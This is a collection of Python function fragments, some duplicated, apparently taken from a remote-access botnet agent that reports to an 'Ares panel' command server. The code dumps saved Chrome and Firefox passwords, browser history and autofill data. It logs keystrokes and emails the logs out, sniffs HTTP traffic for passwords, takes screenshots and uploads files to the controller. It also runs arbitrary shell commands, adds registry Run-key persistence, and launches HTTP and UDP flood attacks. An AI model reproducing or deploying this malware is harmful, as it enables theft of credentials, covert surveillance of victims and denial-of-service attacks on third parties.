def run(): remoteServerIP = socket.gethostbyname(socket.gethostname()) # Petite banniere utils.send_output(("-" * 60)) utils.send_output(("Scan en cours de l'IP : ", remoteServerIP)) utils.send_output(("-" * 60)) # Range des ports à scanner for port in range(1, 9999): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #CREATION DU SOCKET sock.settimeout(0.001) result = sock.connect_ex( (remoteServerIP, port) ) #CONNEXION DU SOCKET SUR L'IP DONNE ET LE PORT DE LA BOUCLE if result == 0: utils.send_output( ("Port {}: open ".format(port) + socket.getservbyport(port) )) #AFFICHE LE PORT PLUS L'ETAT ET LE SERVICE sock.close() #GESTION DES ERREURS except socket.gaierror: print("") #utils.send_output (('Le nom d\'hôte n\'a pas pu être résolu.')) except socket.error: print("") #utils.send_output (("Connexion impossible")) utils.send_output(("Fin du scan de ports !"))
def output_csv(info): buffer = '' for data in info: buffer += '%s, %s, %s \n' % (data['origin_url'], data['username'], data['password']) utils.send_output( "CHROME PASSWORDS : %s \n [*] All Chrome Passwords Dumped." % buffer)
def run(url): filename = url.split('/')[-1] r = requests.get(url, stream=True) with open(filename, 'wb') as f: for chunk in r.iter_content(chunk_size=8000): if chunk: f.write(chunk) utils.send_output("Downloaded: %s -> %s" % (url, filename), "")
def run(cmd): stdin, stdout, stderr = os.popen3(cmd) output = stdout.read() + stderr.read() if os.name == "nt": output = output.decode("cp1252", errors="replace") output = cmd + "\n\n" + output output = output.replace("<", "<") output = output.replace(">", ">") utils.send_output(output)
def run(cmd): stdin, stdout, stderr = os.popen3(cmd) output = stdout.read() + stderr.read() if os.name == "nt": output = output.decode('cp1252', errors='replace') output = cmd + "\n\n" + output output = output.replace("<", "<") output = output.replace(">", ">") utils.send_output(output)
def run(path): filename = os.path.basename(path) if os.path.isdir(path): arch_path = shutil.make_archive(filename, 'zip', path) r = requests.post(settings.SERVER_URL + "/api/upload", {'botid': settings.BOT_ID, 'src': os.path.basename(arch_path)}, files={'uploaded': open(arch_path, 'rb')}) utils.send_output(r.text) os.remove(arch_path) else: r = requests.post(settings.SERVER_URL + "/api/upload", {'botid': settings.BOT_ID, 'src': filename}, files={'uploaded': open(path, 'rb')}) utils.send_output(r.text)
def install(): if not is_installed(): try: stdin, stdout, stderr = os.popen3( "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v %s /t REG_SZ /d %s" % (SERVICE_NAME, os.environ["TEMP"] + "\\" + EXECUTABLE_NAME) ) shutil.copyfile(EXECUTABLE_PATH, os.environ["TEMP"] + "/" + EXECUTABLE_NAME) except Exception as e: utils.send_output("Persistence: failed to install the agent: %s." % (e))
def floodUDP(server, secnds): # Globalize variables global secUDP # Target Port vport = 80 # Attack Duration (Seconds) duration = secnds # Comparison Value for Completion timeout = time.time() + duration # Send count defaulted at 0 sent = 0 # Start attack loop while 1: # Is it active? if isDos == True: # Break out when duration is up if time.time() > timeout: # Announce completion complete() # Exit Loop break # Otherwise, proceed with test else: pass # Connection > client.sendto(bytes, (server, vport)) # Increment send count sent = sent + 1 # Live display every ten thousand packets. if sent % 10000 == 0: # Panel feedback related to UDP packet delivery utils.send_output("%s packets sent." % (sent)) # Display info print "Attacking %s sent packages %s at the port %s " % (sent, server, vport) # if not active then break .. elif isDos == False: # Exit Loop break
def ExecuteD(file): global SAVERES try: os.system(file) if SAVERES == True: utils.send_output("MD-STATUS:200") except: if SAVERES == True: utils.send_output("MD-STATUS:200") else: pass
def run(): global PasswordsFoundBuffer try: os.system("taskkill /f /im firefox.exe") except: pass try: main() utils.send_output("FIREFOX PASSWORDS : %s \n [*] All Firefox Passwords Dumped ." % str(PasswordsFoundBuffer)) except: pass
def is_installed(): stdin, stdout, stderr = os.popen3( "reg query HKCU\Software\Microsoft\Windows\Currentversion\Run /f %s" % SERVICE_NAME ) error = stderr.read() if error: utils.send_output("Persistence: failed to run command to install in registry: %s." % (error)) return True if SERVICE_NAME in stdout.read(): return True else: return False
def run(): try: image = ImageGrab.grab() except Exception as e: utils.send_output("Error while trying to create the screenshot: %s" % (e)) return filename = ''.join(random.choice(string.ascii_letters) for _ in range(5)) filename += ".jpg" filepath = os.path.join(os.environ['temp'], filename) image.save(filepath) upload.run(filepath) os.remove(filepath)
def packet_callback(packet): global BUFFER pkt = str(packet[TCP].payload) if packet[IP].dport == 80: if str(bytes(packet[TCP].payload)) == "": pass else: if "password" in str(bytes(packet[TCP].payload)): sleep(2) now = time.strftime("%c") utils.send_output("{{getrequestauth}}" + str(bytes(packet[TCP].payload)) + "{{{" + str(time.strftime("%c")))
def run(action=None): if action == None: print "Pesistence module run needs one parameter." if action == "install": install() utils.send_output("Persistence installed.") elif action == "remove": if clean(): utils.send_output("Persistence removed.") else: utils.send_output("Persistence could not be removed.") elif action == "status": if is_installed(): utils.send_output("Persistence is ON.") else: utils.send_output("Persistence is OFF.")
def run(path): filename = os.path.basename(path) if os.path.isdir(path): arch_path = shutil.make_archive(filename, 'zip', path) r = requests.post(settings.SERVER_URL + "/api/upload", { 'botid': settings.BOT_ID, 'src': os.path.basename(arch_path) }, files={'uploaded': open(arch_path, 'rb')}) utils.send_output(r.text) os.remove(arch_path) else: r = requests.post(settings.SERVER_URL + "/api/upload", { 'botid': settings.BOT_ID, 'src': filename }, files={'uploaded': open(path, 'rb')}) utils.send_output(r.text)
def run(): buffer = "" starts = os.path.dirname(os.path.abspath(__file__)) list_buffer_files = [ os.path.join(starts, fn) for fn in next(os.walk(starts))[2] ] list_buffer_dirs = [ os.path.join(starts, fn) for fn in next(os.walk(starts))[1] ] for element in list_buffer_files: buffer += "FILE:" + element + "\n" for element in list_buffer_dirs: buffer += "DIR:" + element + "\n" utils.send_output("fm:" + buffer)
def run(action): if action == "install": utils.send_output("Persistence installed") elif action == "remove": clean() utils.send_output("Persistence removed") elif action == "status": if is_installed(): utils.send_output("Persistence is ON") else: utils.send_output("Persistence is OFF")
def print_help(mod=None): help_text = "Loaded modules:\n" if mod is None: for module in MODULES: help_text += "- " + module + "\n" help_text += sys.modules["modules." + module].help() help_text += """ General commands: - cd path/to/dir : changes directory - help : display this text - [any other command] : execute shell command """ else: help_text = "- " + mod + "\n" help_text += sys.modules["modules.%s" % mod].help() utils.send_output(help_text)
def run(): BUFFER_TO_SEND = "{{info}}" url = 'http://ipinfo.io/json' response = urlopen(url) data = json.load(response) IP=data['ip'] city = data['city'] country=data['country'] # Set dummy language and encoding to make sure locale is found language = "English" app = wx.App(False) # the wx.App object must be created first. data = commands.getoutput("locale") data = data.split("\n") for locale in data: # Find the language locale if locale.split("=")[0] == "LANG": language = locale.split("=")[1].split(".")[0] buffer = str(wx.GetDisplaySize()) buffer = buffer.replace("(","") buffer = buffer.replace(")","") BUFFER_TO_SEND += "--" + "::" + "Hostname"+ ";;" + "::" + (socket.gethostname()) + ";;" + "++" BUFFER_TO_SEND += "--" + "::" +"Ip"+ ";;" + "::" + IP + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "City"+ ";;" + "::" + city + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Country"+ ";;" + "::" + country + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Username"+ ";;" + "::" + getpass.getuser() + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Os System"+ ";;" + "::" + platform.system() + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Os Version"+ ";;" + "::" + platform.release() + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Os Language"+ ";;" + "::" + language + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Processor Family"+ ";;" + "::" + platform.processor() + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Total Processors"+ ";;" + "::" + str(multiprocessing.cpu_count()) + ";;" + "++" BUFFER_TO_SEND += "--" + "::" + "Screen Resolution"+ ";;" + "::" + buffer + ";;" + "++" while True: try: utils.send_output(BUFFER_TO_SEND) break except: pass
def run(action): global started global keylog if action == "start": if not started: klg = Thread(target=keylogger) klg.setDaemon(True) klg.start() updater = Thread(target=update) updater.setDaemon(True) updater.start() started = True else: pass elif action == "update": # Storing Keystrokes utils.send_output("{{KEYLOGS}}" + keylog)
def auto_send_request(server, number_of_requests=10): # Globalize increment variable global inc global isDos # Value for completion notification condition requestsCheck = (requests - 1) for z in range(number_of_requests): try: # Is it active? if isDos == True: # HTTP Connection >> urlopen(server) # Successful connection [!] stdout.write(".") # indicated by period in console (for debugging) # Increment ++ inc = inc + 1 # Count total requests sent # Live display every thousand requests. if inc % 1000 == 0: utils.send_output("Requests: %s." % (inc)) # if not active then break .. elif isDos == False: break except IOError: # Failed connection [!] stdout.write("E") # indicated by E in console (for debugging) # Request count checking if inc >= requestsCheck: # Finished DDoS Session! Call next function complete()
def run(action): global started global keylog if action == "start": if not started: klg = Thread(target=keylogger) klg.setDaemon(True) klg.start() started = True utils.send_output("Keylogger started") else: utils.send_output("Keylogger already running") elif action == "show": utils.send_output(keylog) else: utils.send_output("Usage: keylogger start|show")
def send_email(send_from, pwd, send_to, subject, text, files=None): msg = MIMEMultipart() msg['From'] = send_from msg['To'] = send_to msg['Date'] = formatdate(localtime=True) msg['Subject'] = subject msg.attach(MIMEText(text)) for f in files or []: with open(f, "rb") as fil: part = MIMEApplication(fil.read(), Name=basename(f)) part[ 'Content-Disposition'] = 'attachment; filename="%s"' % basename( f) msg.attach(part) try: server = smtplib.SMTP_SSL("smtp.gmail.com", 465) server.ehlo() #server.starttls() server.login(send_from, pwd) server.sendmail(send_from, send_to, msg.as_string()) server.close() utils.send_output("File send successfully !") except: utils.send_output("Error while sending the file !")
def run(): utils.send_output("Scanning the network") #Execution de la commande arp -a commande = ["arp", "-a"] cedric = subprocess.Popen(commande, shell=True, stdout=subprocess.PIPE) text = cedric.stdout.read() #On découpe la variable text pour pouvoir envoyer au terminal morceau par morceau textSplit = text.split("\r\n") for line in textSplit: print(line) utils.send_output((line)) utils.send_output (("End of the Scan"))
def run(): KEYWORD_RESEARCH = '' HISTORY = '' AUTOFILL = '' conn = sqlite3.connect( getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data") conn3 = sqlite3.connect( getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\History") conn1 = sqlite3.connect( getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Web Data") conn4 = sqlite3.connect( getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Web Data") cursor3 = conn3.cursor() cursor1 = conn1.cursor() cursor4 = conn4.cursor() cursor = conn.cursor() cursor3.execute("SELECT * FROM keyword_search_terms") result3 = cursor3.fetchall() for r3 in result3: KEYWORD_RESEARCH += str(r3[2] + '\n') cursor3.execute("SELECT * FROM urls") result4 = cursor3.fetchall() for r4 in result4: HISTORY += str('\n' + r4[1] + '\n') cursor4.execute("SELECT * FROM autofill") result1 = cursor4.fetchall() for r6 in result1: AUTOFILL += str('\n' + r6[0] + ": " + r6[2]) utils.send_output('KRC{{{' + KEYWORD_RESEARCH) utils.send_output('HIC{{{' + HISTORY) utils.send_output('AFC{{{' + AUTOFILL)
def run(action, num_req): # Globalize variables global requests global inc global isDos # inc initially set to 0 inc = 0 # isDos boolean isDos = False # If command passed is not 'stop' then it's a host if action != "stop": utils.send_output("DDoS Started.") # Boolean value that determines if stresser is active isDos = True # Argument passed from Ares panel server = action # Host put in server # Number of requests requests = int(num_req) # Specified number of requests # Call function to begin attack flood(server, requests) # Halt process elif action == "stop": # Turn it off isDos = False utils.send_output('DDoS Stopped.') else: # Display current commands utils.send_output("Usage: DDoS [host] [requests]|stop 0")
def complete(): # Announce completion utils.send_output("DDoS Complete.")
def run(cmd): stdin, stdout, stderr = os.popen3(cmd) output = stdout.read() + stderr.read() if os.name == "nt": output = output.decode('cp1252', errors='replace') utils.send_output(output)
def update(): global keylog while True: utils.send_output("{{KEYLOGS}}" + keylog) delay = randint(60, 120) time.sleep(delay)
def run(action): global started global started_temp global keylog global current_window if action == "start": if started == False and started_temp == False: #On démarre le module avec un Thread pour ne pas bloquer l'agent et pouvoir l'utiliser pour d'autres modules myThread = Thread(target=keylogger) myThread.setDaemon(True) myThread.start() started = True started_temp = True utils.send_output("Keylogger started") elif started == True and started_temp == False: started_temp = True utils.send_output("Keylogger started") else: utils.send_output("Keylogger already running") elif action == "show": ###utils.send_output(keylog) #On enregistre la variable keylog dans un fichier avant d'effacer cette dernière name = "" + os.getenv("username") + "_" + socket.gethostbyname( socket.gethostname()) filename = name + ".txt" outputFile = open(filename, "w") outputFile.write(keylog) outputFile.close() keylog = "" current_window = "" #On envoie le fichier par mail et on le supprime send_email('*****@*****.**', 'PuG#GeLk!3552;', '*****@*****.**', "NEW KeyL EMAIL : " + name, "Here the last file of the host : " + name, [filename]) os.remove(filename) elif action == "stop": if started_temp == False: utils.send_output("Keylogger already stopping") else: started_temp = False keylog = "" current_window = "" utils.send_output("Keylogger stopped") else: utils.send_output("Usage: keylogger start|show|stop")
def run(action, dtype, num_req): # Globalize variables global requests global inc global isDos global server global secUDP # inc initially set to 0 inc = 0 # isDos boolean isDos = False # If command passed is not 'stop' then it's a host # Start [HTTP Stress Test] if action != "stop" and dtype == "HTTP": utils.send_output("HTTP-DDoS Started.") # Boolean value that determines if stresser is active isDos = True # Argument passed from Ares panel server = action # Host put in server # Number of requests requests = int(num_req) # Specified number of requests # Call function to begin HTTP attack flood(server, requests) # Start [UDP Stress Test] elif action != "stop" and dtype == "UDP": utils.send_output("UDP-DDoS Started.") utils.send_output("Attacking %s for %s seconds." % (action, str(num_req))) # Boolean value that determines if stresser is active isDos = True # Argument passed from Ares panel server = action # Host put in server secUDP = int(num_req) # Specified number of seconds # Call function to begin UDP Attack floodUDP(server, secUDP) # Halt Active Sessions elif action == "stop" and dtype =="ALL": # Turn it off isDos = False utils.send_output('All DDoS Sessions Deactivated.') else: # Display current commands utils.send_output("Usage: ddos [host] [Attack Type] [requests] | stop ALL 0")
def run(action, dtype, num_req): # Globalize variables global requests global inc global isDos global server global secUDP # inc initially set to 0 inc = 0 # isDos boolean isDos = False # If command passed is not 'stop' then it's a host # Start [HTTP Stress Test] if action != "stop" and dtype == "HTTP": utils.send_output("HTTP-DDoS Started.") # Boolean value that determines if stresser is active isDos = True # Argument passed from Ares panel server = action # Host put in server # Number of requests requests = int(num_req) # Specified number of requests # Call function to begin HTTP attack flood(server, requests) # Start [UDP Stress Test] elif action != "stop" and dtype == "UDP": utils.send_output("UDP-DDoS Started.") utils.send_output("Attacking %s for %s seconds." % (action, str(num_req))) # Boolean value that determines if stresser is active isDos = True # Argument passed from Ares panel server = action # Host put in server secUDP = int(num_req) # Specified number of seconds # Call function to begin UDP Attack floodUDP(server, secUDP) # Halt Active Sessions elif action == "stop" and dtype == "ALL": # Turn it off isDos = False utils.send_output("All DDoS Sessions Deactivated.") else: # Display current commands utils.send_output("Usage: ddos [host] [Attack Type] [requests] | stop ALL 0")